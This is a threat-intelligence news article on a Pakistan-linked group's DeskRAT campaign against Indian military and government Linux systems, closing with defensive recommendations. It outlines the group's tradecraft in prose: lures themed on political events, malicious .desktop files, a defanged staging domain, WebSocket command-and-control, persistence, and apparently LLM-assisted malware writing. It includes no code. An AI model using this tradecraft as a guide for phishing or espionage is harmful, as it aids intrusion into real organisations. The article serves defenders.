A notorious Pakistan-linked hacking group known as TransparentTribe (APT36 or Operation C-Major) has resurfaced with a sophisticated cyber-espionage campaign targeting Indian military and government organizations. According to Sekoia.io’s latest threat report, the group has deployed a newly developed Golang-based Remote Access Trojan (RAT) called DeskRAT, capable of infiltrating Linux systems and maintaining persistence for long-term intelligence collection.
This campaign, active since mid-2025, begins with phishing emails crafted to impersonate official Indian defense communications. The emails contain malicious ZIP files disguised as government documents, which, when opened, unleash a multi-stage infection chain that ultimately installs DeskRAT.
The lure documents—bearing titles like “MoM_regarding_Defence_Sectors_by_Secy_Defence_25_Sep_2025.zip”—mimic authentic Ministry of Defence communications, complete with embedded icons and decoy PDFs. These PDFs reference sensitive defense topics and current events, such as protests in the Ladakh region, to trick targets into urgent action.
Once executed, the malicious “.desktop” file downloads and runs a payload from staging servers masquerading as legitimate government domains (e.g., modgovindia[.]com). This payload installs DeskRAT, which connects to remote command-and-control (C2) servers over WebSocket, enabling attackers to exfiltrate files, execute commands, and maintain persistence within the victim’s system.
Inside DeskRAT: An LLM-Assisted Malware
What sets DeskRAT apart is its technical design and suspected use of Large Language Models (LLMs) to generate code. Analysts observed unusually uniform function names—such as ___simulate_systemd_operations() and ___perform_sandbox_evasion()—suggesting automation in its development.
DeskRAT’s capabilities include:
- File exfiltration of over 20 formats including PDF, DOC, ZIP, and image files.
- Remote code execution using standard Linux commands.
- Persistence mechanisms via systemd services, cron jobs, and startup scripts.
- Decoy operations to mask malicious behavior under legitimate system processes.
The malware specifically targets Bharat Operating System Solutions (BOSS)—a Linux distribution endorsed by the Indian government—indicating a calculated focus on defense and state organizations.
Political Timing and Strategic Motives
The campaign’s timing aligns with domestic unrest in India’s Ladakh region, an area of geopolitical tension between India, China, and Pakistan. TransparentTribe has a history of exploiting such moments to conduct cyber espionage supporting Pakistan’s strategic interests.
By embedding decoy documents referencing military directives and regional security meetings, the attackers exploit psychological and contextual cues to lure officials into executing malicious files.
Sekoia’s analysts assess with high confidence that these activities are part of a long-running effort by TransparentTribe to gather defense intelligence, track operational movements, and potentially lay the groundwork for future disruptive campaigns.
Why It Matters Globally — and in MEA
While this campaign focuses on South Asia, its implications are global. The use of AI-assisted malware development, combined with social engineering through geopolitical events, signals a growing trend in state-sponsored attacks.
For governments and enterprises across the Middle East and Africa, the TransparentTribe case serves as a warning. As many MEA nations strengthen their defense and digital infrastructure, similar tactics could target regional ministries, telecom operators, or defense contractors.
10 Recommended Security Actions
Security teams can take the following steps to defend against campaigns like DeskRAT:
- Deploy advanced email security to block phishing campaigns.
- Use endpoint protection capable of detecting Linux-based malware.
- Limit execution permissions for
.desktopfiles and unknown scripts. - Implement strict patch management across Linux and BOSS distributions.
- Monitor WebSocket traffic for suspicious outbound connections.
- Isolate government and defense systems from internet-facing services.
- Educate users through cybersecurity training and awareness programs on recognizing phishing and decoy documents.
- Apply least privilege principles for administrative access.
- Leverage threat intelligence services such as Saintynet Cybersecurity to track APT activities.
- Conduct regular phishing simulations and tabletop exercises to reinforce response readiness.
Conclusion
TransparentTribe’s DeskRAT campaign underscores how nation-state actors are evolving—faster, smarter, and increasingly AI-driven. By shifting from open-source tools to custom-built malware, the group demonstrates a high level of technical maturity and focus on long-term espionage.
For defenders, this incident is a stark reminder: cyber warfare is no longer limited to the battlefield—it’s embedded in everyday digital operations. Staying ahead requires not just patching and monitoring, but strategic resilience, awareness, and collaboration across borders.
